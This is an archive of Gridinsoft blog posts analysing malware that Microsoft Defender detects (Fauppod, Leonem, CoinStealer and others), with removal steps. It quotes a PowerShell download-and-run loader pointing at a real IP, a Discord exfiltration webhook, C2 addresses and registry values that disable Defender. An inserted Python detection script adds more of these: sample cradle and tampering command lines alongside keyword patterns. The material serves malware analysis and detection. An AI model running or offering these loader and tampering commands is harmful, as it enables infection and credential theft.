Windows Defender Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Mon, 16 Sep 2024 22:59:36 +0000

Trojan:Win32/Fauppod!ml
https://gridinsoft.com/blogs/trojanwin32-fauppod-ml/
Thu, 12 Sep 2024 15:25:21 +0000

The post Trojan:Win32/Fauppod!ml appeared first on Gridinsoft Blog.

Trojan:Win32/Fauppod!ml is a detection that is based on machine learning and is assigned to an unspecified threat type. Usually such threats are identified by behavior rather than signatures. Nonetheless, this exact malware detection poses a serious hazard, as it appears to flag the activity of a targeted infostealer trojan.

Trojan:Win32/Fauppod!ml Overview

Trojan:Win32/Fauppod!ml is a generic detection name that Microsoft Defender assigns to malware detected by its AI-based detection system. Typically, this detection points at the activity of an infostealer that primarily targets banking data. The “ml” suffix in the detection name indicates the use of a machine learning system rather than traditional signature-based detection. Usually, over time, as more information about the malware's behavior is analyzed, the detection is replaced with a more specific detection name.

Trojan:Win32/Fauppod!ml detection window

As mentioned at the beginning, the main goal of Fauppod is to steal the credentials of online accounts. One thing it goes for in particular is login credentials for online banking accounts.

The main spreading ways of this malware are malicious email attachments (Word or Excel files) and game mods or other files from untrustworthy sources. Despite specifically targeting banking information, it is not picky about its victims and steals data from all categories of users.

Fauppod Analysis

Let’s take a closer look at the technical side of how Fauppod!ml behaves on the system. The first thing the malware does after launching is to check whether it is the only copy running on the device. It does this by creating and accessing the following mutexes:

\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex
\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex

Since our sample is a DLL file, it needs a legitimate Rundll32.exe process to run. The malware copies the legitimate Rundll32.exe file to the temporary folder (C:\Users\User\AppData\Local\Temp\rundll32.exe) and uses process hijacking techniques.

Next, the malware checks the UAC status and the presence of anti-malware on the system. It checks these registry keys to disable system defenses and ensure persistence:

HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Fauppod Execution

The malware executes shell commands that allow it to perform its main function:

C:\Users\User\AppData\Local\Temp\rundll32.exe rpl909.zip.dll
"C:\Windows\System32\rundll32.exe" C:\Users\A4148~1.MON\AppData\Local\Temp\b81d42902b581dd9fea37c4b6a8ff180.19772.dll,DllMain

After that, the malware deploys payloads and injects itself into legitimate processes, allowing it to function without raising suspicion from security software. It also manipulates legitimate processes such as wmiadap.exe, svchost.exe and cmd.exe. The malware executes the following processes:

wmiadap.exe /F /T /R
%windir%\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
%windir%\system32\wbem\wmiprvse.exe
%windir%\System32\svchost.exe -k WerSvcGroup
13f43b565119f43f7155f96cafa8b05d.exe
C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\init.dll"
C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\User\Desktop\init.dll",#1
C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\User\Desktop\init.dll",#1
C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_Clockcould@8
C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_DllRegisterServer@0
C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\User\Desktop\init.dll,_Representfinish@4

So we can conclude that the malware also abuses the svchost.exe instance in WerSvcGroup, which hosts the Windows Error Reporting Service. This is a common malware practice: masking its actions by injecting code into system services. The 13f43b565119f43f7155f96cafa8b05d.exe executable also appears to be part of the payload.

Fauppod Connections

The malware uses both standard and non-standard addresses and ports. Among the standard ones:

GET http://watson.microsoft.com/StageOne/rundll32_exe/6_1_7600_16385/4a5bc637/StackHash_1abe/0_0_0_0/00000000/c0000005/fd8b3a80.htm?LCID=1040&OS=6.1.7601.2.00010100.1.0.48.17514&SM=LENOVO&SPN=64755N2&BV=7UET92WW%20(3.22%20)&MID=F2EC8DC6-EB4A-4B44-95EF-9B81DC7C287B

Using standard ports and addresses that belong to Microsoft allows the malware to hide its actions. On the other hand, suspicious addresses and non-standard ports indicate communication with the C2 server. In our case, these addresses are:

97.107.127.161:443
45.33.94.33:5037
159.89.91.92:5037
158.69.118.130:1443

Some of the IP addresses in the list (and quite a few others that I’ve excluded for the sake of readability) correspond to compromised websites. This is a frequently used tactic: attackers use a hacked website as an intermediary command server, while the requests look legitimate to anyone who tries to trace them.

Is Trojan:Win32/Fauppod!ml False Detection?

As I have mentioned several times already, Trojan:Win32/Fauppod!ml is a heuristic detection based on machine learning. This means it can sometimes result in false positives. Heuristic methods analyze file patterns, behaviors, and structural elements rather than relying on predefined signatures. As a result, legitimate software with uncommon characteristics or behaviors may be flagged as suspicious. In such cases, after some time, the anti-malware software stops flagging the file as a threat.

How to Remove Trojan Fauppod?

If you encounter Trojan:Win32/Fauppod!ml and are unsure whether it’s a false detection or a real threat, an effective solution is to use a third-party anti-malware solution. GridinSoft Anti-Malware would be a great option that can either confirm or disprove the threat. Use the instructions below to scan your device for threats.

Trojan:Win32/Leonem
https://gridinsoft.com/blogs/trojan-win32-leonem/
Wed, 11 Sep 2024 13:37:54 +0000

Trojan:Win32/Leonem is spyware that targets any login data on a compromised system, including data saved in browsers and email clients. It primarily spreads through malicious documents or disguised as legitimate software.

Trojan:Win32/Leonem Overview

Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which aims at stealing sensitive information from a victim’s system. In addition to its main function, it can also operate as a malware dropper, i.e. deliver other malware. In terms of its core functionality, Leonem can carry out activities like keylogging and collecting sensitive data (logins, browser passwords, browser history, cookies, cache, etc.). It also seeks other login credentials stored on the compromised system, including those in email clients.

Trojan:Win32/Leonem detection popup

As for the payload, the Leonem Trojan is capable of downloading additional malicious components. Most often, it deploys ransomware and backdoors, though its capabilities are not limited to these threats. This malware typically spreads through malicious attachments in phishing emails or bundled with legitimate software from untrustworthy sources. Once launched on the system, Trojan:Win32/Leonem attempts to disable security software and modify system settings to ensure persistence by running each time the operating system boots.

Technical Analysis

Let’s now take a deeper look at the threat on an infected system. Since it is a classic information stealer, it has a rather predictable behavior pattern. The malware’s initial actions focus on detecting sandbox environments, debuggers, or virtual machines. To do this, Leonem leverages the following legitimate processes:

%windir%\System32\svchost.exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
"%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Leonem retrieves BIOS information using WMI queries, specifically targeting Win32_Bios and Win32_NetworkAdapter. Additionally, it abuses the aspnet_compiler.exe process and queries hardware properties via WMI. Among other things, it inspects specific registry values and files, including:

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config

In addition to detecting the virtual environment, the malware generates a system fingerprint to uniquely identify the infected system.

Next, the malware assesses the presence and status of installed anti-malware solutions. If Microsoft Defender is enabled on the system, the malware attempts to turn it off. This also allows the malware to establish persistence within the system. For all this, Leonem abuses the following legitimate processes and checks the following key values and system locations:

C:\Windows\system32\services.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\SecurityHealthService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning

Data Collection

After all the checks, Trojan:Win32/Leonem initiates its primary operation: data collection. It gathers passwords and session tokens from browsers, email clients, and other applications that keep authentication details locally. In addition, the malware creates a DirectInput object, enabling it to function as a keylogger, i.e. capture all text typed on the keyboard. It specifically targets the following file paths:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\\AppData\Local\360Chrome\Chrome\User Data
C:\Users\\AppData\Local\Chromium\User Data
C:\Users\\AppData\Local\Mailbird\Store\Store.db
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Login Data
C:\Users\\AppData\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage
C:\Users\\AppData\Local\Torch\User Data
C:\Users\\AppData\Local\UCBrowser\
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\logins.json
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\signons.sqlite
C:\Users\\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Users\\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
C:\Users\\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\\AppData\Roaming\Thunderbird\profiles.ini

Leonem collects data both in plain text and in the form of a hash.

Data Exfiltration

At the final stage of the attack, Trojan:Win32/Leonem sends the gathered data to its command server. The reviewed sample uses a Discord webhook for this purpose. Beforehand, the malware sets up TCP connections on ports 443 and 80, which confirms that it attempts to communicate with remote servers to transmit information or receive commands. Below are some of the requests sent to the said webhook.

POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404

The 200 status at the end means that the request completed successfully; the 404, on the other hand, indicates an error, most likely that the webhook has been deleted or changed. In addition, the malware uses the ip-api.com service to retrieve details about the environment where it is executed. In this way, it tries to determine whether it is running on a hosting server or on a regular computer.

How To Remove Trojan:Win32/Leonem?

As we can see, Trojan:Win32/Leonem is a rather serious threat that deactivates Microsoft Defender whenever possible. Therefore, to effectively remove this Trojan, it’s recommended to use a reliable third-party anti-malware solution like GridinSoft Anti-Malware. To eliminate Trojan:Win32/Leonem from your system, follow these steps:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the anti-malware program takes for each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

What is PUA:Win32/GameHack?
https://gridinsoft.com/blogs/pua-win32-gamehack/
Thu, 05 Sep 2024 09:23:48 +0000

PUA:Win32/GameHack is potentially unwanted software associated with tools used for hacking games or gaining unfair advantages over other players. This category typically includes cheats, trainers, and other software that injects itself into other processes.

PUA:Win32/GameHack Overview

PUA:Win32/GameHack is a generic Microsoft Defender detection for potentially unwanted programs (PUAs) associated with cheats or game hacking tools. While these programs are not always truly malicious, they can pose security risks or violate the terms of service of legitimate software. Also, the use of such software can lead to game or system instability, as not all such programs are tested well enough. However, the main danger is that these programs can carry other malware or serve as a vector for its distribution.

PUA:Win32/GameHack detection

The main reason for this is that using these tools requires disabling the system’s security software. This gives the green light to any threats contained in the GameHack. The file may contain encrypted or compressed data, which allows it to evade detection or conceal its true functionality. Some versions modify or create registry keys, which may as well serve as a cover for malicious activities.

Technical Analysis

Let’s examine how PUA:Win32/GameHack behaves on the target system. For the test sample, I have chosen Solara.dir, a cheat for one popular cubic game. When the executable file is launched, the system process rundll32.exe is accessed by several instances of the cheat.

"C:\Windows\system32\rundll32.exe"
"C:\Windows\system32\rundll32.exe" "C:\Users\\AppData\Local\Temp\Solara/Microsoft.Web.WebView2.Core.dll",#1
"C:\Windows\system32\rundll32.exe" "C:\Users\\AppData\Local\Temp\Solara/Microsoft.Web.WebView2.WinForms.dll",#1

The first thing the app does is check the system for a virtual environment or sandbox. It checks some values in the system, including:

\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Main Functionality

Next, the chosen cheat performs its primary function. It uses an archiver to unpack the files of the cheat:

"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\Solara.Dir.zip"
C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\t1244hhg.u4j" "C:\Users\user\Desktop\Solara.Dir.zip"

Most files are unpacked into a randomly named folder inside the temporary directory. The latter is rather concerning behavior: legitimate programs rarely use such strange names:

C:\Users\user\AppData\Local\Temp\t1244hhg.u4j\Solara
C:\Users\user\AppData\Local\Temp\t1244hhg.u4j\Solara\Microsoft.Web.WebView2.Core.dll
C:\Users\user\AppData\Local\Temp\t1244hhg.u4j\Solara\Monaco\combined.html
C:\Users\user\AppData\Local\Temp\t1244hhg.u4j\Solara\Monaco\fileaccess

Next, the GameHack program executes scripts via the Command Prompt. It primarily targets the files it has just dropped, but the functionality of such commands closely resembles what dropper malware does.

"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && C:\Windows\system32\wscript.exe ^"C:\Users\\AppData\Local\Temp\Solara/Monaco/fileaccess/index.js^"
"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && C:\Windows\system32\wscript.exe ^"C:\Users\\AppData\Local\Temp\Solara/Monaco/fileaccess/node_modules/accepts/index.js^"
"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && C:\Windows\system32\wscript.exe ^"C:\Users\\AppData\Local\Temp\Solara/Monaco/fileaccess/node_modules/array-flatten/array-flatten.js^"

These manipulations with the Command Prompt are accompanied by calls to several other components. Once again, I cannot see a sign of malicious activity in this case, but it is as edgy as it can get.

C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

After these commands, the cheat can inject its code into the game process, adding features such as the ability to fly or unlock all inventory, which give the player an unfair edge over others. Once again, I’d emphasize that such actions go against the rules of the vast majority of games.

Is PUA:Win32/GameHack False Positive?

Sometimes GameHack can be a false positive detection. In most cases, this is because of how anti-cheat solutions operate. Anti-cheat systems often work at a low level of the system, injecting their code into the game process, checking the integrity of files, and analyzing network traffic. In other words, anti-cheat systems use methods similar to those of cheats, which can trigger anti-malware detections.

False positive detections typically disappear quickly, unlike real hacks, as the developers promptly contact anti-malware vendors to resolve these issues. In addition, they can inform users about it on official platforms and advise them to add the game folder to the exceptions, which can be a practical solution.

How To Remove PUA:Win32/GameHack?

If you encounter a GameHack detection and suspect it’s not a false positive, you can use GridinSoft Anti-Malware to get rid of this and other threats; just follow the instructions below:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the anti-malware program takes for each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Trojan:PowerShell/CoinStealer.RP!MTB
https://gridinsoft.com/blogs/trojan-powershell-coinstealer-rpmtb/
Thu, 29 Aug 2024 12:11:21 +0000

Trojan:PowerShell/CoinStealer.RP!MTB is a Microsoft Defender detection that normally flags malware capable of stealing cryptocurrency wallets. You may see it popping up after downloading a program from the Web or running a dodgy PowerShell script. More precisely, it collects credentials of different applications, and crypto wallets are among its primary targets. The stealthiness of this malware makes it hard to delete manually, so in this post, I will show you how to remove it.

Trojan:PowerShell/CoinStealer.RP!MTB Virus Detection Overview

The Trojan:PowerShell/CoinStealer.RP!MTB detection name corresponds to infostealer malware that targets crypto wallets among other things. The exact malware family may vary, as the main reason for the detection – targeting crypto wallet credentials – is now a widespread feature of infostealers. Also, the detection name clearly points at this virus running commands in the PowerShell environment. This, in fact, complicates the analysis: Microsoft Defender's detection points at a genuine PowerShell instance.

CoinStealer.RP!MTB detection PowerShell

One less obvious thing about CoinStealer.RP!MTB is that it is a heuristic detection. That is actually the reason why it has no malware family identifier in the detection name. With this detection, Microsoft Defender effectively says “I have noticed fishy activity that aims at stealing login data for crypto wallets”. At the same time, it is hardly a false positive: while heuristics can show a false detection, there are no cases of CoinStealer being incorrect.

Another danger of this malware, aside from the said crypto wallet losses, is losing access to your online accounts. At its core, the CoinStealer virus is an infostealer, hence it can target social media accounts and desktop app accounts. Several samples that I’ve analyzed were stealing Discord and Steam session tokens.

Spreading Ways

A PowerShell script is a rather common form for malicious programs, though it requires specific spreading approaches. In particular, “useful scripts for Windows speed-up” or similar material that you may find online can carry this virus. And there’s more – fraudsters constantly seek new ways to make users execute the malware themselves.

For instance, they may use landing pages that appear after a redirect from another website, asking the user to download and run the script “to prove that you’re not a robot”. In some cases, an entire malicious script was posted as text, with the demand to copy it and paste it into PowerShell. Obviously, this ends in nothing but malware being injected. And this fits Trojan:PowerShell/CoinStealer.RP!MTB ideally.

Example of a malicious site that asks the user to run the code in PS

Technical Analysis

Now, let’s have a deeper look into how the malicious script functions. In fact, the PowerShell part is mostly about downloading the actual malware. PowerShell scripts, although abused by malware quite often, are poorly suited for accessing folders or extracting data. Still, a script is enough to download the virus and configure the networking so the malware will have no problems with C2 communications. It also provides the malicious program with all the necessary privileges and anti-detection protection, so it runs unbothered.

One particular malware sample that uses PowerShell scripts for loading is Lumma Stealer. The script that eventually creates the Trojan:PowerShell/CoinStealer.RP!MTB detection runs a rather simple operation. It connects to a remote server, downloads the file, and runs it from that exact location.

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://20.99.186.246:223/1.exe', 'C:\\Users\\%username%\\AppData\\Local\\erk3nfaib.exe');Start-Process 'C:\\Users\\%username%\\AppData\\Local\\erk3nfaib.exe'
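As an added example (not code from the page or from Gridinsoft), the following Python shows how a defender could flag this download-and-run loader pattern in process-creation telemetry, together with two other behaviours described earlier in this feed: rundll32.exe run from %TEMP% (the Fauppod sample) and command lines that touch the Windows Defender Disable* values (the Leonem sample). The ProcessEvent record, the rule names and the sample command lines are this example's own assumptions; the sample events are constructed, with a TEST-NET address in place of a real one.

```python
from dataclasses import dataclass

# Minimal process-creation record. The field names are this example's own
# assumption, not a real telemetry schema; any EDR/Sysmon event can be mapped onto it.
@dataclass
class ProcessEvent:
    image: str         # full path of the executable that was started
    command_line: str  # its command line as logged

# The two legitimate locations of rundll32.exe. The Fauppod write-up notes that the
# sample copies rundll32.exe into %TEMP% and runs it from there.
RUNDLL32_HOMES = (
    r"c:\windows\system32\rundll32.exe",
    r"c:\windows\syswow64\rundll32.exe",
)

# Tokens that together make up the PowerShell download-and-run pattern shown
# in the CoinStealer write-up: hide the window, bypass the execution policy,
# fetch a file, run it. All three groups must be present for the rule to fire.
PS_STEALTH = ("-windowstyle hidden", "-executionpolicy bypass")
PS_DOWNLOAD = ("downloadfile(", "downloadstring(", "invoke-webrequest", "iwr ")
PS_EXECUTE = ("start-process", "invoke-expression", "iex ")

# Defender registry values the Leonem write-up lists as tampering targets.
DEFENDER_KEY_FRAGMENT = "\\windows defender\\"
DEFENDER_DISABLE_VALUES = (
    "disableantivirus",
    "disableioavprotection",
    "disablerealtimemonitoring",
    "disablescriptscanning",
    "mpengine_disablescriptscanning",
)


def findings_for(ev: ProcessEvent) -> list[str]:
    """Return the names of the rules that fire for one event (empty if clean)."""
    hits = []
    image = ev.image.lower()
    cmd = ev.command_line.lower()

    # Rule 1: PowerShell download cradle. Requiring stealth + download + execute
    # together keeps ordinary admin scripts that merely fetch a file from firing.
    if image.endswith("powershell.exe"):
        stealth = any(t in cmd for t in PS_STEALTH)
        download = any(t in cmd for t in PS_DOWNLOAD)
        execute = any(t in cmd for t in PS_EXECUTE)
        if stealth and download and execute:
            hits.append("powershell_download_cradle")

    # Rule 2: rundll32.exe started from anywhere other than its two real homes.
    if image.endswith("rundll32.exe") and image not in RUNDLL32_HOMES:
        hits.append("rundll32_outside_system_dirs")

    # Rule 3: a command line that names a Defender "Disable*" value under the
    # Windows Defender key (e.g. a reg.exe add). Registry reads by the malware
    # itself are not visible here; this only catches explicit tampering commands.
    if DEFENDER_KEY_FRAGMENT in cmd and any(v in cmd for v in DEFENDER_DISABLE_VALUES):
        hits.append("defender_tamper_key_reference")
    return hits


def triage(events: list[ProcessEvent]) -> dict[str, list[str]]:
    """Map the command line of every suspicious event to the rules it triggered."""
    report = {}
    for ev in events:
        hits = findings_for(ev)
        if hits:
            report[ev.command_line] = hits
    return report


# Constructed sample events (not from the page's sandbox runs). The cradle mirrors
# the page's one-liner but uses a TEST-NET address and a made-up file name.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden "
        "$ErrorActionPreference = 'silentlycontinue';"
        "(New-Object System.Net.WebClient).DownloadFile('http://203.0.113.10:223/1.exe', "
        r"'C:\Users\Public\upd8r.exe');Start-Process 'C:\Users\Public\upd8r.exe'",
    ),
    ProcessEvent(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -File C:\Scripts\nightly-backup.ps1",  # benign
    ),
    ProcessEvent(
        r"C:\Users\user\AppData\Local\Temp\rundll32.exe",
        r"C:\Users\user\AppData\Local\Temp\rundll32.exe payload.dll",  # Fauppod-style
    ),
    ProcessEvent(
        r"C:\Windows\System32\rundll32.exe",
        r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL",  # benign
    ),
    ProcessEvent(
        r"C:\Windows\System32\reg.exe",
        r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" '
        "/v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f",  # Leonem-style tampering
    ),
]

if __name__ == "__main__":
    for cmd, rules in triage(SAMPLE_EVENTS).items():
        print(", ".join(rules), "<-", cmd[:80])
```

Three of the five constructed events are flagged, each by exactly one rule; the two benign ones pass, which is the point of requiring all three token groups in the PowerShell rule.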

Malware Execution

As I’ve opted for Lumma as the most prominent “user” of the injection through PowerShell, I will further analyze it to show what it can do in the infected system. Following the execution, it loads the DLLs by abusing svchost.exe – a legitimate Windows process. Malware simply commands it to execute the library it needs:

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe -k DcomLaunch -p

This is what gives the malware not only the full set of libraries to run with but also the much-needed persistence. At this point, some of the CoinStealer virus files are running with system-level privileges, so antivirus programs will likely treat them as safe processes. Next, it switches to the main course of the attack – collecting user data.

Data Collection

Although I’ve chosen a specific malware family to show off the capabilities of the malware that Trojan:PowerShell/CoinStealer.RP!MTB can deliver, the same list applies to pretty much any infostealer that can appear in these circumstances. It goes through the folders of web browsers, collecting login credentials:

%localappdata%\Google\Chrome\User Data
%localappdata%\Chromium\User Data
%localappdata%\Microsoft\Edge\User Data
%localappdata%\Kometa\User Data
%localappdata%\Opera Software\Opera Stable
%localappdata%\Opera Software\Opera GX Stable

Data collection from the browser is followed by the much-expected collection of crypto wallet data. The malware searches for keywords in file and folder names (like “bitcoin” or “coinbase”) to locate the needed directory. Then it goes for the Important Files/Profile folders and dumps all the data from them. This further allows cybercriminals to drain all the contents of these wallets.

Exfiltration & C2 Communications

The malware rarely employs unusual tactics when it comes to communications with the command server. It carries a pack of C2 addresses embedded into its own code, and goes through this list trying to find an active one.

https://barebrilliancedkoso.shop/api
https://liabiliytshareodlkv.shop/api
https://notoriousdcellkw.shop/api

After establishing the connection, CoinStealer.RP!MTB sends the entire pack of data to the command server. Depending on the malware sample, it may be a plain text file or an archive with the extracted credentials sorted by source and type. But it almost always uses an encrypted connection, which defeats almost any attempt at packet analysis.

How to Remove Trojan:PowerShell/CoinStealer.RP!MTB?

To get rid of CoinStealer.RP!MTB, I recommend using GridinSoft Anti-Malware. Removing both the malicious script and the actual malware manually is not a trivial task, as they may hide pretty deep in the system. Also, as usually happens with modern malware, it creates several copies of itself on the disk, making manual removal even more complicated. GridinSoft Anti-Malware will do all this for you in just a few clicks.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the anti-malware program takes for each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

PUABundler:Win32/DriverPack
https://gridinsoft.com/blogs/puabundler-win32-driverpack/
Tue, 27 Aug 2024 09:07:28 +0000

The post PUABundler:Win32/DriverPack appeared first on Gridinsoft Blog.

]]>
PUABundler:Win32/DriverPack is potentially unwanted software that claims to install or update drivers. In fact, it floods the system with unwanted software and changes browser settings without the user’s consent. In this post, I will explain the dangers behind this unwanted app and show the ways to remove it from the system.

PUABundler:Win32/DriverPack Overview

PUABundler:Win32/DriverPack is a detection from Microsoft Defender, associated with the eponymous DriverPack Solution program. Initially, it was a program developed by a Russian author for automatic driver installation on Windows XP. However, since Windows began carrying all the necessary drivers in the installation, driver updaters have become useless. Moreover, the fact that a program operates with drivers creates significant security threats and thus should undergo diligent checks.

And that is where DriverPack shows its dark nature. Over time, it started installing additional software during its own installation – so-called software bundling. Today, DriverPack is synonymous with a bunch of unwanted and sometimes malicious software that can easily brick a freshly installed Windows. This is evidenced by many users on the Internet who have decided to take the easy way out and use DriverPack to install drivers. After using this program, at best, users get a bunch of garbage in the system. At worst, certain devices or system components may malfunction or fail.

Why is PUABundler:Win32/DriverPack Dangerous?

To understand why using DriverPack is dangerous, it’s important to understand how it operates. The first version of DriverPack was a standalone installer that installed drivers on devices that lacked them. These days, however, the program tries to update the drivers already present in the system – an edgy approach, if you ask me. The problem is that the program sources newer drivers from questionable places. This may result in the aforementioned failures across the system, but, what is worse, it is a direct malware risk.

PUABundler:Win32/DriverPack detection

Another issue is the unwanted software bundled with PUABundler:Win32/DriverPack. Regardless of the user’s choice, DriverPack installs its services, injects advertisements all across the system, and modifies the homepage in all browsers. For the latter, instead of the standard search engine and homepage, DriverPack sets Internet-start.net (see the scan report) as the default homepage and search engine. Although the official website claims to cooperate with antivirus vendors, users tend to see a different picture.

User Experience

I decided to simulate a clean OS setup and driver installation using DriverPack (sample analysis report) in fully automatic mode. This allowed me to get a complete opinion on what PUABundler DriverPack is. There are several red flags that appear even before the installation, but more are to come.

The first warning sign is the claim on the main page about false positives from certain antiviruses. Although this may be the case, false positives are normally a temporary occurrence. A legitimate program should not be detected as unwanted or malicious on a continuous basis; if it is, this is no longer an occasional false positive but a real detection. And the claim on the website suggests that the latter is true. During the launch and operation of the installer itself, Microsoft Defender did flag PUA presence in the system.

DriverPack site warning
Warnings on the DriverPack website say clearly about it being a questionable app

And, sure enough, the described changes to the web browser popped up. PUABundler:Win32/DriverPack modified the homepage and the default search engine. The latter, in turn, shows questionable search results, which is a rather straightforward phishing risk: by manipulating the results, fraudsters behind the search engine can push malicious results to the top. The unwanted program does all this to generate revenue through ads and user redirects, not for the convenience of users. And these ads are the reason why some of the DriverPack samples are tagged as adware.

Modified web browser
Main page of a web browser after being modified by DriverPack PUA

Technical Analysis

Let’s now examine the technical aspects of this unwanted software. I analyzed a copy downloaded from the official website. Notably, it has 53 out of 75 detections on VirusTotal, and the reason is obvious. During installation, PUABundler:Win32/DriverPack leverages the Mshta.exe process, typically used to execute HTML applications. It then loads an executable from AppData\Local\Temp into a temporary folder and executes the following commands:

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\\AppData\Local\Temp\wgulwvl5\wgulwvl5.cmdline"
"C:\Windows\SysWOW64\mshta.exe" "C:\Program Files (x86)\DriverPack\run.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} --sfx "software.exe"

During installation, DriverPack checks the system’s software and hardware components by going through certain registry keys. This is a standard procedure for such programs, designed to locate drivers, so it is hardly a bad sign. And even if we suppose malicious intent, the worst this data may be used for is to distinguish this system from others.

HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\System\Setup
